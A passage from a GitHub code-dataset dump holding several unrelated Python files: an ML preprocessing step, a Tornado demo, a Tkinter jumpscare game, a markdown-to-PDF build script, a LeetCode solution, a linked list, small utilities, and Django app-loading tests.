mlpipeline.entity.artifact_entity import DataTransformationArtifact\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.compose import ColumnTransformer\nfrom mlpipeline.utils.common import save_object\nfrom mlpipeline.components.model_trainer import ModelTrainer\n\n\nclass DataTransformation:\n def __init__(self,data_transformation_config_info:DataTransformationConfig):\n try:\n self.data_transformation_config_info = data_transformation_config_info\n self.train_df = pd.read_csv(self.data_transformation_config_info.train_data_file)\n self.test_df = pd.read_csv(self.data_transformation_config_info.test_data_file)\n\n logging.info(f\"{'>>' * 10}Data Transformation log started.{'<<' * 10} \")\n except Exception as e:\n raise CustomException(e, sys) from e\n \n\n def get_data_transformation_obj(self):\n try:\n logging.info(\"Data Transformation Started\")\n numerical_features =['age', 'workclass', 'educational-num', 'marital-status', 'occupation',\n 'relationship', 'race', 'gender', 'capital-gain', 'capital-loss',\n 'hours-per-week']\n \n num_pipeline = Pipeline(\n steps=[\n (\"imputer\",SimpleImputer(strategy=\"median\")),\n (\"scaler\",StandardScaler())\n ]\n )\n \n preprocessor = ColumnTransformer([\n (\"NUm_pipeline\",num_pipeline,numerical_features)\n ])\n\n return preprocessor\n except Exception as e:\n raise CustomException(e,sys) from e\n \n def remove_outlier_IQR(self,col,df):\n try:\n Q1 = df[col].quantile(0.25)\n Q3 = df[col].quantile(0.75)\n\n iqr = Q3-Q1\n\n upper_limit = Q3+1.5*iqr\n lower_limit = Q1-1.5*iqr\n\n df.loc[(df[col]>upper_limit),col] = upper_limit\n df.loc[(df[col]DataTransformationArtifact:\n\n try:\n data_transformation_config_info = self.data_transformation_config_info\n train_data = pd.read_csv(self.data_transformation_config_info.train_data_file)\n test_data = pd.read_csv(self.data_transformation_config_info.test_data_file)\n\n numerical_features =['age', 'workclass', 'educational-num', 'marital-status', 'occupation',\n 'relationship', 'race', 'gender', 'capital-gain', 'capital-loss',\n 'hours-per-week']\n \n for col in numerical_features:\n self.remove_outlier_IQR(col= col ,df = train_data)\n logging.info(\"Outliers on our train data\")\n\n for col in numerical_features: \n self.remove_outlier_IQR(col= col ,df = test_data)\n logging.info(\"Outliers on our test data\")\n\n preprocess_obj = self.get_data_transformation_obj()\n\n target_columns = \"income\"\n drop_columns = [target_columns]\n\n logging.info(\"Splitting data into dependent and independent features\")\n input_feature_train_data = train_data.drop(target_columns,axis=1)\n target_feature_train_data = train_data[target_columns]\n\n input_feature_test_data = test_data.drop(target_columns,axis=1)\n target_feature_test_data = test_data[target_columns]\n\n input_train_arr = preprocess_obj.fit_transform(input_feature_train_data)\n input_test_arr = preprocess_obj.transform(input_feature_test_data)\n\n train_array = np.c_[input_train_arr,np.array(target_feature_train_data)]\n test_array = np.c_[input_test_arr,np.array(target_feature_test_data)]\n\n preprocessing_obj_path = data_transformation_config_info.preprocessed_object_file_path\n\n\n logging.info(\"Saving the pickle file\")\n save_object(file_path = self.data_transformation_config_info.preprocessed_object_file_path,obj=preprocess_obj)\n\n data_transformation_artifact = DataTransformationArtifact(preprocessed_object_path=preprocessing_obj_path)\n\n return(train_array,test_array,self.data_transformation_config_info.preprocessed_object_file_path)\n #return 
data_transformation_artifact\n        \n        \n        except Exception as e:\n            raise CustomException(e,sys) from e\n        \n\n#if __name__ == \"__main__\":\n    #config = ConfigurationManager(config_file_path=\"configs\\config.yaml\")\n    #data_ingestion_config_info = config.get_data_ingestion_config()\n    #data_transformation_config = config.get_data_transformation_config(data_ingestion_config=data_ingestion_config_info)\n    #data_transformation = DataTransformation(data_transformation_config_info=data_transformation_config)\n    #data_transformation_response = data_transformation.inititate_data_transformation()\n\n    #modeltrainer = ModelTrainer()\n    #print(modeltrainer.initiate_model_trainer())\n","repo_name":"ARPITA-ds/ml_pipeline_project","sub_path":"src/mlpipeline/components/data_transformation.py","file_name":"data_transformation.py","file_ext":"py","file_size_in_byte":5517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
{"seq_id":"72719071781","text":"'''\nThis file is the synchronous (blocking) callee of the simulated service; it listens on port 8002.\n'''\nimport tornado.ioloop\nimport tornado.options\nimport tornado.web\nimport time\nfrom tornado.options import define, options\n\ndefine('port', default=8002, help='run port', type=int)\n\n\nclass SyncHandler(tornado.web.RequestHandler):\n    def get(self):\n        time.sleep(3)\n        self.write(\"同步代码\")\n\n\nif __name__ == '__main__':\n    tornado.options.parse_command_line()\n\n    app = tornado.web.Application(\n        handlers=[\n            (r'/sync', SyncHandler),\n        ],\n        template_path='templates',\n        static_path='static',\n        debug=True,\n    )\n    app.db = {}\n    print(\"端口:\", options.port)\n    app.listen(options.port)\n    tornado.ioloop.IOLoop.instance().start()\n","repo_name":"zzb15997937197/tornado-study","sub_path":"base_study/web/gen/sync_exp/demo02.py","file_name":"demo02.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
{"seq_id":"20196593309","text":"from tkinter import *\r\nfrom PIL import Image, ImageTk\r\nfrom pygame import mixer\r\nfrom attack import Jumpscare\r\n\r\nmain_jump = Tk()\r\nmain_jump.title('СИМУЛЯТОР СКРИМЕРОВ')\r\nmain_jump.geometry('1920x1080')\r\nmain_jump.resizable(False, False)\r\n\r\nmixer.init(channels=2)\r\n\r\nimg = ImageTk.PhotoImage(Image.open('cams/images/cam03b/cam03b.jpg'))\r\nimg1 = ImageTk.PhotoImage(Image.open('animatronics/strange_bunny2.png'))\r\n\r\ntalking = 'Какой же ты всё-таки наивный.\\nНу сломал ты аниматроников, и что теперь?\\n' \\\r\n          'Ну документы нашёл, отдал их полиции.\\nВот только она тебя не спасёт.\\n' \\\r\n          'Она нас покрывает, понимаешь?\\nПокрывает всю Fazbear Entertainment!\\n' \\\r\n          'И пусть прошло много времени с тех пор, как я застрял в этом костюме зайца с пружинами, ничего ' \\\r\n          'не изменилось.\\nВообще. И поэтому я хочу, чтобы знал, КТО Я ТАКОЙ.\\n' \\\r\n          'Я Уильям Афтон, создатель аниматроников.\\nЯ всегда возвращаюсь. 
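# A compact equivalent of remove_outlier_IQR from the record above, assuming a
# numeric pandas Series: Series.clip() performs both boundary assignments that
# the original does with two .loc writes.
import pandas as pd

def clip_iqr(s: pd.Series) -> pd.Series:
    q1, q3 = s.quantile(0.25), s.quantile(0.75)
    iqr = q3 - q1
    return s.clip(lower=q1 - 1.5 * iqr, upper=q3 + 1.5 * iqr)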
Я ВСЕГДА ОСТАЮСЬ.\\n'\r\n\r\ncanvas = Canvas(bg='black', width=1920, height=1080)\r\ncanvas.pack()\r\ncanvas.create_image(0, 0, image=img, anchor='nw')\r\n\r\n\r\ndef summon_freddy():\r\n jump = Toplevel()\r\n jump.title('СМЕРТЬ')\r\n jump.geometry('1920x1080')\r\n jump.resizable(False, False)\r\n\r\n anim = Jumpscare(jump)\r\n anim.pack()\r\n anim.load('jumpscares/freddy_jumpscare.gif')\r\n\r\n jump_sound = mixer.Sound('sounds/jumpscares/jumpscare_default.wav')\r\n mixer.Channel(1).play(jump_sound)\r\n\r\n def no_salvation():\r\n pass\r\n\r\n jump.protocol('WM_DELETE_WINDOW', no_salvation)\r\n\r\n jump.after(5000, jump.destroy)\r\n\r\n\r\ndef summon_bonnie():\r\n jump = Toplevel()\r\n jump.title('СМЕРТЬ')\r\n jump.geometry('1920x1080')\r\n jump.resizable(False, False)\r\n\r\n anim = Jumpscare(jump)\r\n anim.pack()\r\n anim.load('jumpscares/bonnie_jumpscare.gif')\r\n\r\n jump_sound = mixer.Sound('sounds/jumpscares/jumpscare_default.wav')\r\n mixer.Channel(1).play(jump_sound)\r\n\r\n def no_salvation():\r\n pass\r\n\r\n jump.protocol('WM_DELETE_WINDOW', no_salvation)\r\n\r\n jump.after(5000, jump.destroy)\r\n\r\n\r\ndef summon_chica():\r\n jump = Toplevel()\r\n jump.title('СМЕРТЬ')\r\n jump.geometry('1920x1080')\r\n jump.resizable(False, False)\r\n\r\n anim = Jumpscare(jump)\r\n anim.pack()\r\n anim.load('jumpscares/chica_jumpscare.gif')\r\n\r\n jump_sound = mixer.Sound('sounds/jumpscares/jumpscare_default.wav')\r\n mixer.Channel(1).play(jump_sound)\r\n\r\n def no_salvation():\r\n pass\r\n\r\n jump.protocol('WM_DELETE_WINDOW', no_salvation)\r\n\r\n jump.after(5000, jump.destroy)\r\n\r\n\r\ndef summon_foxy():\r\n jump = Toplevel()\r\n jump.title('СМЕРТЬ')\r\n jump.geometry('1920x1080')\r\n jump.resizable(False, False)\r\n\r\n anim = Jumpscare(jump)\r\n anim.pack()\r\n anim.load('jumpscares/foxy_jumpscare.gif')\r\n\r\n jump_sound = mixer.Sound('sounds/jumpscares/jumpscare_default.wav')\r\n mixer.Channel(1).play(jump_sound)\r\n\r\n def no_salvation():\r\n pass\r\n\r\n jump.protocol('WM_DELETE_WINDOW', no_salvation)\r\n\r\n jump.after(5000, jump.destroy)\r\n\r\n\r\ndef what():\r\n spring_jump = Toplevel()\r\n spring_jump.title('???')\r\n spring_jump.geometry('1920x1080')\r\n spring_jump.resizable(False, False)\r\n\r\n canv = Canvas(spring_jump, bg='black', width=1920, height=1080)\r\n canv.pack()\r\n\r\n\r\n def talk():\r\n canv.create_text(960, 165, text=talking, fill='#FF00FF', font='Times 20')\r\n\r\n\r\n spring_sound = mixer.Sound('sounds/jumpscares/jumpscare_spring.wav')\r\n mixer.Channel(0).play(spring_sound)\r\n\r\n canv.create_image(0, 0, image=img1, anchor='nw')\r\n spring_jump.after(2000, talk)\r\n\r\n\r\n def no_salvation():\r\n pass\r\n\r\n\r\n spring_jump.protocol('WM_DELETE_WINDOW', no_salvation)\r\n\r\n spring_jump.after(20000, main_jump.destroy)\r\n\r\n\r\nfred_button = Button(canvas, text='Фредди', bg='#593720', fg='white', command=summon_freddy)\r\nfred_button.place(x=1440, y=75)\r\n\r\nbonn_button = Button(canvas, text='Бонни', bg='#423e54', fg='white', command=summon_bonnie)\r\nbonn_button.place(x=480, y=75)\r\n\r\nchic_button = Button(canvas, text='Чика', bg='#b3923c', fg='white', command=summon_chica)\r\nchic_button.place(x=960, y=75)\r\n\r\nfox_button = Button(canvas, text='Фокси', bg='#a4352e', fg='white', command=summon_foxy)\r\nfox_button.place(x=955, y=125)\r\n\r\nwhat_button = Button(canvas, text='???', bg='#393611', fg='white', command=what)\r\nwhat_button.place(x=955, y=300)\r\n\r\nambience = mixer.Sound('sounds/ambience2.wav')\r\nmixer.Channel(0).play(ambience, 
loops=-1)\r\n\r\nmain_jump.mainloop()\r\n","repo_name":"Vovan4ikYT/frede","sub_path":"mshkfrede/jump_simulator.py","file_name":"jump_simulator.py","file_ext":"py","file_size_in_byte":4884,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"39098155469","text":"from head_angle_w_mag import *\n\n\ndef run():\n startTime = 550000\n endTime = 800000\n\n gliderTimeCutData = prepareGliderGyroData(dev_glider, glider_neutral_acc_vector, glider_gyro_calibration_vector,\n startTime, endTime)\n headTimeCutData = prepareGliderGyroData(dev_head, head_neutral_acc_vector, head_gyro_calibration_vector,\n startTime, endTime)\n headMagData = prepare_magnetometer_data_orientated(dev_head, head_neutral_acc_vector, startTime, endTime)\n\n gliderInterpolatedData = interpolateDatas(gliderTimeCutData, headTimeCutData)\n headInterpolatedData = interpolateDatas(headTimeCutData, gliderTimeCutData)\n\n gliderAngleData = cumulateZAxisData(gliderInterpolatedData)\n headAngleData = cumulateZAxisData(headInterpolatedData)\n\n headRelativeAngle = getHeadRelativeAngle(headInterpolatedData, gliderInterpolatedData)\n\n plotAll(headAngleData, gliderAngleData, headRelativeAngle, headMagData)\n\n\nif __name__ == \"__main__\":\n run()\n","repo_name":"flatronek/vfr-lookout-analysis","sub_path":"wesu-app-data-quality-analysis/head_angle_w_mag_orientated.py","file_name":"head_angle_w_mag_orientated.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"72480829861","text":"\"\"\"Process the markdown files.\nThe purpose of the script is to create a duplicate src directory within which\nall of the markdown files are processed to match the specifications of building\na pdf from multiple markdown files using the pandoc library (***add link to\npandoc library documentation***) with pdf specific text rendering in mind as\nwell.\n\"\"\"\n\nimport os\nimport subprocess\nimport re\nfrom datetime import datetime\n\n\ndef run_shell_cmd(command):\n \"\"\"Run shell/bash commands passed as a string using subprocess module.\"\"\"\n process = subprocess.Popen(command.split(), stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n output = process.stdout.read()\n\n return output.decode('utf-8')\n\n\ndef copy_src():\n \"\"\"Duplicate src directory to a new but temp directory named 'src_copy'.\"\"\"\n # source and target directories\n src_path = \"../src/\"\n target_path = \"src_copy\"\n\n # make new directory\n mkdir_cmd = \"mkdir \"+target_path\n run_shell_cmd(mkdir_cmd)\n\n # copy contents of src directory\n copy_cmd = \"cp -R \"+src_path+\" \"+target_path\n run_shell_cmd(copy_cmd)\n\n\ndef copy_bids_logo():\n \"\"\"Copy BIDS_logo.jpg from the BIDS_logo dir in the root of the repo.\"\"\"\n run_shell_cmd(\"cp ../BIDS_logo/BIDS_logo.jpg src_copy/src/images/\")\n\n\ndef copy_images(root_path):\n \"\"\"Copy images.\n Will be done from images directory of subdirectories to images directory\n in the src directory\n \"\"\"\n subdir_list = []\n\n # walk through the src directory to find subdirectories named 'images'\n # and copy contents to the 'images' directory in the duplicate src \n # directory\n for root, dirs, files in os.walk(root_path):\n if 'images' in dirs:\n subdir_list.append(root)\n\n for each in subdir_list:\n if each != root_path:\n run_shell_cmd(\"cp -R \"+each+\"/images\"+\" \"+root_path+\"/images/\")\n\n\ndef extract_header_string():\n \"\"\"Extract the latest release's version 
number and date from CHANGES.md.\"\"\"\n released_versions = []\n run_shell_cmd(\"cp ../mkdocs.yml src_copy/\")\n\n with open(os.path.join(os.path.dirname(__file__), 'src_copy/mkdocs.yml'), 'r') as file:\n data = file.readlines()\n\n header_string = data[0].split(\": \")[1]\n \n title = \" \".join(header_string.split()[0:4])\n version_number = header_string.split()[-1]\n build_date = datetime.today().strftime('%Y-%m-%d')\n\n return title, version_number, build_date\n\n\ndef add_header():\n \"\"\"Add the header string extracted from changelog to header.tex file.\"\"\"\n title, version_number, build_date = extract_header_string()\n header = \" \".join([title, version_number, build_date])\n\n # creating a header string with latest version number and date\n header_string = (\"\\chead{ \" + header + \" }\")\n\n with open('header.tex', 'r') as file:\n data = file.readlines()\n\n # now change the last but 2nd line, note that you have to add a newline\n data[-2] = header_string+'\\n'\n\n # re-write header.tex file with new header string\n with open('header.tex', 'w') as file:\n file.writelines(data)\n\n\ndef remove_internal_links(root_path, link_type):\n \"\"\"Find and replace all cross and same markdown internal links.\n The links will be replaced with plain text associated with it.\n \"\"\"\n if link_type == 'cross':\n # regex that matches cross markdown links within a file\n # TODO: add more documentation explaining regex\n primary_pattern = re.compile(r'\\[((?!http).[\\w\\s.\\(\\)`*/–]+)\\]\\(((?!http).+(\\.md|\\.yml|\\.md#[\\w\\-\\w]+))\\)') # noqa: E501\n elif link_type == 'same':\n # regex that matches references sections within the same markdown\n primary_pattern = re.compile(r'\\[([\\w\\s.\\(\\)`*/–]+)\\]\\(([#\\w\\-._\\w]+)\\)')\n\n for root, dirs, files in os.walk(root_path):\n for file in files:\n if file.endswith(\".md\"):\n with open(os.path.join(root, file), 'r') as markdown:\n data = markdown.readlines()\n\n for ind, line in enumerate(data):\n match = primary_pattern.search(line)\n\n if match:\n line = re.sub(primary_pattern,\n match.group().split('](')[0][1:], line)\n\n data[ind] = line\n\n with open(os.path.join(root, file), 'w') as markdown:\n markdown.writelines(data)\n\n\ndef modify_changelog():\n \"\"\"Change first line of the changelog to markdown Heading 1.\n This modification makes sure that in the pdf build, changelog is a new\n chapter.\n \"\"\"\n with open('src_copy/src/CHANGES.md', 'r') as file:\n data = file.readlines()\n\n data[0] = \"# Changelog\"\n\n with open('src_copy/src/CHANGES.md', 'w') as file:\n file.writelines(data)\n\n\ndef edit_titlepage():\n \"\"\"Add title and version number of the specification to the titlepage.\"\"\"\n title, version_number, build_date = extract_header_string()\n\n with open('cover.tex', 'r') as file:\n data = file.readlines()\n\n data[-1] = (\"\\\\textsc{\\large \"+version_number+\"}\" +\n \"\\\\\\\\[0.5cm]\" +\n \"{\\large \" +\n build_date +\n \"}\" +\n \"\\\\\\\\[2cm]\" +\n \"\\\\vfill\" +\n \"\\\\end{titlepage}\")\n\n with open('cover.tex', 'w') as file:\n data = file.writelines(data)\n\n\nif __name__ == '__main__':\n\n duplicated_src_dir_path = 'src_copy/src'\n\n # Step 1: make a copy of the src directory in the current directory\n copy_src()\n\n # Step 2: copy BIDS_logo to images directory of the src_copy directory\n copy_bids_logo()\n\n # Step 3: copy images from subdirectories of src_copy directory\n copy_images(duplicated_src_dir_path)\n subprocess.call(\"mv src_copy/src/images/images/* src_copy/src/images/\", \n 
shell=True)\n\n # Step 4: extract the latest version number, date and title\n extract_header_string()\n add_header()\n\n edit_titlepage()\n\n # Step 5: modify changelog to be a level 1 heading to facilitate section \n # separation\n modify_changelog()\n\n # Step 6: remove all internal links\n remove_internal_links(duplicated_src_dir_path, 'cross')\n remove_internal_links(duplicated_src_dir_path, 'same')","repo_name":"bendhouseart/yaml_fix","sub_path":"pdf_build_src/process_markdowns.py","file_name":"process_markdowns.py","file_ext":"py","file_size_in_byte":6279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74034130659","text":"\"\"\"\nA sequence of number is called arithmetic if it consists of at least three elements and if the difference between any two consecutive elements is the same.\n\nFor example, these are arithmetic sequence:\n\n1, 3, 5, 7, 9\n7, 7, 7, 7\n3, -1, -5, -9\nThe following sequence is not arithmetic.\n\n1, 1, 2, 5, 7\n\nA zero-indexed array A consisting of N numbers is given. A slice of that array is any pair of integers (P, Q) such that 0 <= P < Q < N.\n\nA slice (P, Q) of array A is called arithmetic if the sequence:\nA[P], A[p + 1], ..., A[Q - 1], A[Q] is arithmetic. In particular, this means that P + 1 < Q.\n\nThe function should return the number of arithmetic slices in the array A.\n\n\nExample:\n\nA = [1, 2, 3, 4]\n\nreturn: 3, for 3 arithmetic slices in A: [1, 2, 3], [2, 3, 4] and [1, 2, 3, 4] itself.\n\"\"\"\n\nclass Solution:\n def numberOfArithmeticSlices(self, A):\n \"\"\"\n :type A: List[int]\n :rtype: int\n \"\"\"\n # count = 0\n # for s in range(len(A) - 2):\n # dif = A[s + 1] - A[s]\n # for e in range(s + 2, len(A)):\n # if A[e] - A[e - 1] == dif:\n # count += 1\n # else:\n # break\n # return count\n\n # # using dp\n # dp = [0] * len(A)\n # count = 0\n # for i in range(2, len(A)):\n # if A[i] - A[i - 1] == A[i - 1] - A[i - 2]:\n # dp[i] = 1 + dp[i - 1]\n # count += dp[i]\n # return count\n\n #using dp 2\n dp = 0\n count = 0\n for i in range(2, len(A)):\n if A[i] - A[i - 1] == A[i - 1] - A[i - 2]:\n dp = 1 + dp\n count += dp\n else:\n dp = 0\n return count\n\n\n\nif __name__ == \"__main__\":\n s = Solution()\n print(s.numberOfArithmeticSlices([1,2,3,4]))","repo_name":"choupijiang/leetcode","sub_path":"ArithmeticSlices.py","file_name":"ArithmeticSlices.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"29730281611","text":"from typing import Generator\nfrom app.db.session import SessionLocal\nfrom app.utils.lists import PaginationParams\n\n\ndef get_database() -> Generator:\n try:\n db = SessionLocal()\n yield db\n finally:\n db.close()\n\n\nclass GetPaginationParams(object):\n def __call__(self, per_page: int = 30, page: int = 1) -> PaginationParams:\n return PaginationParams(per_page=per_page, page=page)\n","repo_name":"stliakis/fastapi-postgres-alembic-cookiecutter","sub_path":"{{cookiecutter.project_slug}}/backend/app/app/api/deps.py","file_name":"deps.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"33755242531","text":"class Node():\n\n def __init__(self, data):\n self.data = data\n self.next = None\n\n\nclass LinkedList():\n\n def __init__(self):\n self.head = None\n self.tail = None\n\n def append(self, data):\n new_node = Node(data)\n\n if self.head == None:\n self.head = 
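# A closed-form cross-check for the dp in the numberOfArithmeticSlices record
# above: a maximal arithmetic run of n elements contributes
# (n - 1) * (n - 2) // 2 slices, one per sub-run of length >= 3. For
# [1, 2, 3, 4] the single run has n = 4, giving 3, matching the script's output.
def slices_in_run(n):
    return max(0, (n - 1) * (n - 2) // 2)

assert slices_in_run(4) == 3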
new_node\n            self.tail = self.head\n            self.length = 1\n        else:\n            self.tail.next = new_node\n            self.tail = new_node\n            self.length += 1\n\n    def prepend(self, data):\n        new_node = Node(data)\n        new_node.next = self.head\n        self.head = new_node\n\n        self.length += 1\n\n    def insert(self, index, data):\n        new_node = Node(data)\n        temp = self.head\n\n        if index >= self.length:\n            self.append(data)\n            return\n\n        if index == 0:\n            self.prepend(data)\n            return\n\n        for i in range(self.length):\n            if i == index - 1:\n                temp.next, new_node.next = new_node, temp.next\n                self.length += 1\n                break\n            temp = temp.next\n\n    def remove(self, index):\n        temp = self.head\n\n        if index >= self.length:\n            print('Entered wrong index')\n            return\n\n        if index == 0:\n            self.head = self.head.next\n            self.length -= 1\n            return\n\n        for i in range(index):\n            if i == index - 1:\n                temp.next = temp.next.next\n                self.length -= 1\n                break\n            temp = temp.next\n\n\nlist = LinkedList()\nlist.append(10)\nlist.append(5)\nlist.append(6)\nlist.prepend(1)\nlist.insert(2, 99)\nlist.insert(34, 23)\n# list.remove(5)\n","repo_name":"washimimizuku/python-data-structures-and-algorithms","sub_path":"data-structures/linked-lists/linked_list.py","file_name":"linked_list.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
{"seq_id":"23712436882","text":"# -*- coding: utf-8 -*-\nfrom openerp import fields, models\n\n\nclass WkfCmdSpecialAmountProjectApproval(models.Model):\n    _name = 'wkf.cmd.special.amount.project.approval'\n    _description = 'Special Amount Project Approval'\n\n    doctype_id = fields.Many2one(\n        'wkf.config.doctype',\n        string='Document Type',\n        required=True,\n    )\n    employee_id = fields.Many2one(\n        'hr.employee',\n        string='Employee',\n        required=True,\n    )\n    amount_min = fields.Float(\n        string=\"Minimum\"\n    )\n    amount_max = fields.Float(\n        string=\"Maximum\"\n    )\n    org_id = fields.Many2one(\n        'res.org',\n        string='Org',\n        related='employee_id.org_id',\n    )\n","repo_name":"ecosoft-odoo/pb2_addons","sub_path":"pabi_workflow/models/wkf_config_project.py","file_name":"wkf_config_project.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"35"}
{"seq_id":"70682325541","text":"import time, base64, urllib, hashlib, hmac, random, sys, re, traceback\nfrom datetime import datetime\n\ndef get_exc_str():\n    exc = sys.exc_info()\n    exc_tb = ''.join(traceback.format_tb(exc[2]))\n    exc_string = \"%s: %s\" % (exc[1].__class__.__name__, unicode(exc[1].message))\n    return exc_string\n\ndef generateS3Url(AWS_ACCESS_KEY, AWS_SECRET_KEY, bucket, object_id, timeout = 1200):\n    access_key = AWS_ACCESS_KEY\n    secret_key = AWS_SECRET_KEY\n    expires = time.mktime(time.localtime()) + timeout\n    stringToSign = 'GET\\n\\n\\n%d\\n/%s/%s' % (expires,bucket,object_id)\n    signature = urllib.quote_plus(base64.encodestring(hmac.new(secret_key,stringToSign,hashlib.sha1).digest()).strip())\n    return 'http://s3.amazonaws.com/%s/%s?AWSAccessKeyId=%s&Expires=%d&Signature=%s' % (bucket,object_id,access_key,expires,signature)\n\ndef difftime(then, _abs=False):\n    now = datetime.now()\n    delta = now - then\n    delta_secs = (delta.days*86400) + delta.seconds + (delta.microseconds/1000000.0)\n    if _abs: return abs(delta_secs)\n    return delta_secs\n\ndef set_path(d, v, p):\n    
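# A small traversal helper for the LinkedList record above (to_list is a
# hypothetical name, not in the original file), handy for checking the
# append/prepend/insert calls at the bottom of that script:
def to_list(linked):
    out, node = [], linked.head
    while node is not None:
        out.append(node.data)
        node = node.next
    return out

# With the calls above, to_list(list) == [1, 10, 99, 5, 6, 23]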
assert type(p) in (list, tuple)\n assert type(d) in (dict, list, tuple)\n current = d\n for k in p[:-1]:\n current = current[k]\n return current[p[-1]]\n\ndef delete_path(d, p):\n assert type(p) in (list, tuple)\n assert type(d) in (dict, list, tuple)\n current = d\n for k in p[:-1]:\n current = current[k]\n del current[p[-1]]\n\ndef generate_object_id(length=8):\n import random\n return u''.join([random.choice('BCDFGHJKLMNPQRSTVWXYZ2345678') for i in xrange(length)])\n\ndef timeit(func, *args, **kwargs):\n t = time.time()\n result = func(*args, **kwargs)\n t = time.time()-t\n return t, 1/t, result\n\ndef slugify(value):\n # slugify from django, taken out for global use\n import unicodedata\n value = unicodedata.normalize('NFKD', unicode(value)).encode('ascii', 'ignore')\n value = unicode(re.sub('[^\\w\\s-]', '', value).strip().lower())\n return re.sub('[-\\s]+', '-', value)\n\ndef str_to_attr(s):\n mod, attr = s.rsplit('.',1)\n mod = __import__(mod, {}, {}, [attr])\n return getattr(mod, attr)\n\ndef list_to_callables(l):\n for i in range(len(l)):\n s = l[i]\n if type(s) in (str, unicode):\n l[i] = str_to_attr(s)\n","repo_name":"goswarm/swarm","sub_path":"swarm/utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"1367685542","text":"with open('input.txt','r') as INPUT:\r\n lines = INPUT.readlines()\r\n n = int(lines[0])\r\n\r\n result = []\r\n\r\n if n == 1:\r\n result = [1]\r\n elif n == 2:\r\n result = [1, 2]\r\n else:\r\n l = [1, 2]\r\n for i in range(3, n + 1):\r\n l.append(i)\r\n l[i // 2 if i % 2 == 1 else i // 2 - 1], l[-1] = l[-1], l[i // 2 if i % 2 == 1 else i // 2 - 1]\r\n result = l\r\n\r\n with open('output.txt', 'w') as OUTPUT:\r\n OUTPUT.write(' '.join([str(i) for i in result]))","repo_name":"SuperFlanker2014/PADS_Spring_2019","sub_path":"2.3/23v2.py","file_name":"23v2.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"4145578629","text":"#!/usr/bin/env python3\n\nimport os, re\n\nfrom setuptools import setup, find_packages\n\nhere = os.path.abspath(os.path.dirname(__file__))\n\nwith open(os.path.join(here, 'README.md')) as f:\n README = f.read()\n\nif __name__ == \"__main__\":\n\n setup(\n name = 'better_kerchunk',\n version = '0.0.1',\n description = 'Better Kerchunk',\n long_description = README,\n classifiers = [],\n author = 'Daniel Westwood',\n author_email = 'daniel.westwood@stfc.ac.uk',\n url = 'https://github.com/cedadev/better_kerchunk',\n keywords = '',\n packages = find_packages(),\n include_package_data = True,\n zip_safe = False,\n install_requires = [],\n )","repo_name":"cedadev/better_kerchunk","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"1859046353","text":"from __future__ import unicode_literals\n\nimport os\nimport sys\nfrom unittest import TestCase\n\nfrom django.core.apps import app_cache\nfrom django.core.apps.cache import AppCache\nfrom django.test.utils import override_settings\nfrom django.utils._os import upath\n\n\nclass EggLoadingTest(TestCase):\n\n def setUp(self):\n self.old_path = sys.path[:]\n self.egg_dir = '%s/eggs' % os.path.dirname(upath(__file__))\n\n # The models need to be removed after the test in order to prevent bad\n # interactions with the 
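# A quick usage sketch for the nested-path helpers above: a path is a list of
# keys/indices applied left to right, so the same triple of functions reads,
# writes and deletes one location in a nested structure.
cfg = {'db': {'hosts': ['a', 'b']}}
set_path(cfg, 'c', ['db', 'hosts', 1])
assert get_path(cfg, ['db', 'hosts', 1]) == 'c'
delete_path(cfg, ['db', 'hosts', 1])
assert cfg == {'db': {'hosts': ['a']}}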
flush operation in other tests.\n self._old_models = app_cache.app_configs['app_loading'].models.copy()\n\n def tearDown(self):\n app_cache.app_configs['app_loading'].models = self._old_models\n app_cache._get_models_cache = {}\n\n sys.path = self.old_path\n\n def test_egg1(self):\n \"\"\"Models module can be loaded from an app in an egg\"\"\"\n egg_name = '%s/modelapp.egg' % self.egg_dir\n sys.path.append(egg_name)\n models = app_cache.load_app('app_with_models')\n self.assertFalse(models is None)\n\n def test_egg2(self):\n \"\"\"Loading an app from an egg that has no models returns no models (and no error)\"\"\"\n egg_name = '%s/nomodelapp.egg' % self.egg_dir\n sys.path.append(egg_name)\n models = app_cache.load_app('app_no_models')\n self.assertTrue(models is None)\n\n def test_egg3(self):\n \"\"\"Models module can be loaded from an app located under an egg's top-level package\"\"\"\n egg_name = '%s/omelet.egg' % self.egg_dir\n sys.path.append(egg_name)\n models = app_cache.load_app('omelet.app_with_models')\n self.assertFalse(models is None)\n\n def test_egg4(self):\n \"\"\"Loading an app with no models from under the top-level egg package generates no error\"\"\"\n egg_name = '%s/omelet.egg' % self.egg_dir\n sys.path.append(egg_name)\n models = app_cache.load_app('omelet.app_no_models')\n self.assertTrue(models is None)\n\n def test_egg5(self):\n \"\"\"Loading an app from an egg that has an import error in its models module raises that error\"\"\"\n egg_name = '%s/brokenapp.egg' % self.egg_dir\n sys.path.append(egg_name)\n self.assertRaises(ImportError, app_cache.load_app, 'broken_app')\n raised = None\n try:\n app_cache.load_app('broken_app')\n except ImportError as e:\n raised = e\n\n # Make sure the message is indicating the actual\n # problem in the broken app.\n self.assertTrue(raised 